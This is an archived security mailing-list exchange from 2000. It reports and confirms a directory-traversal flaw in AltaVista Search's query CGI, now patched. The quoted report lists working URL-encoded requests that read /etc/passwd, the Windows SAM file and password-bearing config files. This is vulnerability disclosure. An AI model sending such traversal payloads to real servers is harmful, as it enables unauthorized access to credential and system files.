Hi Rudi,
Just tried to reproduce the bugs you were talking about, and I can
confirm that they exist without their secpatch and that they are gone
after having installed the secpatch.
Guy ROELANDTS
Compaq EMEA
> -----Original Message-----
> From: rudi carell [mailto:[EMAIL PROTECTED]]
> Sent: Sunday, January 09, 2000 4:37 PM
> To: [EMAIL PROTECTED]
> Subject: Altavista followup
>
>
> hola,
>
> more bugs in the AV-Search thing ..
>
> using uri-encoded strings it is possible to view "any" file
> on the system ..
>
> examples:
>
> unixxxsss ...
>
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/
etc/passwd
or on an micro$oft IIS ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\r
epair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/inde
xer.log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/poli
cy.conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays :-/
RC
[EMAIL PROTECTED]
